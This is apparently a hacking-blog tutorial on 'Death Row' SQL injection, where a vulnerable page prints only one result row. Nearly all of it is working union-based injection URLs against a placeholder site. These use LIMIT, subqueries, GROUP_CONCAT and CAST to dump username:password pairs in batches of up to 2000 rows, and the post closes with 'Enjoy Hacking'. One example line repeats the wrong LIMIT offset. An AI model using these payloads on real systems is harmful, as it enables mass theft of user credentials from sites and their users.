Note If you have not read Basic Injection Tutorial
What is Death row?
Well while injecting a Web application you will usually face it, this is the scenario when the whole array output of the Query do not gets printed. The web application Simply prints the first.
For Example:
The query "Select username,password from users;" Will output the complete list of users. but now it depends on how the web application is giving you output. So normally in 70% cases you may have to face "Death Row Injection"
To overcome such situation we use Limit or if we are intelligent enough to make a condition through which we can output the data which we actually need. Here we will discuss both of these ways.
Let us First understand the Internal Queries.
Select username from users;
This will output all the usernames...but our target web application is outputting only 1. So in order to iterate through the situation we will user limit.
Syntax : Limit "From Row Number", "Number of Rows"
I hope its very clear to understand that the first parameter takes the row number from which you want to start, and the second one takes number of rows you want to output.
Now let us try it with the above Query
Query:
Select Username from users limit 0,1;
Example from the injection Point of view
www.vuln-site.com/index.php?view=43
If you have read the basic injection then i don't need to tell you how to get get the error and them comment out the rest part and then find the number of columns. After doing all that let us assume the injection is:
www.vuln-site.com/index.php?view=-43 union select 1,2,3,4,5--
As you can see single Quote is missing after 43 that means i am injecting in a integer Input Query. So now when we try to get the usernames and password using the above Query.
www.vuln-site.com/index.php?view=43 union select 1,2,concat(username,0x3a,password),4,5 from users--
The above query will output all rows as once but the web application may just return one. So to get all using Limit we will go one by one.
www.vuln-site.com/index.php?view=43 union select 1,2,concat(username,0x3a,password),4,5 from users limit 0,1--(first row)
www.vuln-site.com/index.php?view=43 union select 1,2,concat(username,0x3a,password),4,5 from users limit 1,1--(2nd row)
www.vuln-site.com/index.php?view=43 union select 1,2,concat(username,0x3a,password),4,5 from users limit n,1--(nth row)
NOTE : The Red Text in the queries is not a part of query, its there just for a better explaination.
So now we can keep increasing the first parameter to get each row one by one. But if the database is huge. Damnnn...its a headache to go like this. And a lazy guy like me will never like to go through this torture. Yeah so now there is an another way to handle the situation.
We can use Sub Query to extract particular number of rows from the Database and then concat them into the output. Herez an example to do this one:
Query:
select group_concat(username,0x3a,password,0x0a)from (select username,password from users limit 0,100);
So the above query got 100 rows conctenated into the output. Lets see how the Injection will look like.
www.vuln-site.com/index.php?view=43 union select 1,2,group_concat(username,0x3a,password),4,5 from (select username,password from users limit 0,100)a-- (first 100 rows)
www.vuln-site.com/index.php?view=43 union select 1,2,group_concat(username,0x3a,password),4,5 from (select username,password from users limit 0,100)a-- (100 rows from 100th row)
www.vuln-site.com/index.php?view=43 union select 1,2,group_concat(username,0x3a,password),4,5 from (select username,password from users limit n,100)a-- (100 rows from nth row)
In this way we can speed up the Process...But again if the we think of a Database Containing lacks of Rows. It again becomes a headache. So one will think that we we can increase the number of rows each time we Inject to fasten up the process. Hmmmm but a problem, Group_concat function have a limit of 1024 characters and it will Trim the rest of characters. So there is another way out of it. we can use the Cast Function to increase the Buffer.
Query:
SELECT CAST(GROUP_CONCAT(username,0x3a,password,0x0a) AS CHAR(2048)) FROM users;
I have increase the buffer to 2048, you can try and increase more like increasing 8192, but not more than that as you know its the default limit of a POST output. hmmm so what if you cant get all at once?. we can again use the Sub Query trick.
SELECT CAST(GROUP_CONCAT(username,0x3a,password,0x0a) AS CHAR(2048)) FROM (SELECT username,password FROM users LIMIT 0,2000)a;
Well Now the process is enough faster. Let us check our Injection.
www.vuln-site.com/index.php?view=43 union SELECT 1,2,CAST(GROUP_CONCAT(username, 0x3a,password,0x0a) AS CHAR(2048)),4,5 FROM (SELECT username,password FROM users LIMIT 0,2000)a--(first 2000 rows)
www.vuln-site.com/index.php?view=43 union SELECT 1,2,CAST(GROUP_CONCAT(username, 0x3a,password,0x0a) AS CHAR(2048)),4,5 FROM (SELECT username,password FROM users LIMIT 2000,2000)a--(2000 rows from 2000th row)
www.vuln-site.com/index.php?view=43 union SELECT 1,2,CAST(GROUP_CONCAT(username, 0x3a,password,0x0a) AS CHAR(2048)),4,5 FROM (SELECT username,password FROM users LIMIT 4000,2000)a--(2000 rows from nth row)
Well if you are still feeling lazy? then try Evil Twin Injection which uses Variable, functions and Sub queries to dump the Database.
Have Fun Enjoy Hacking.
0 comments:
Post a Comment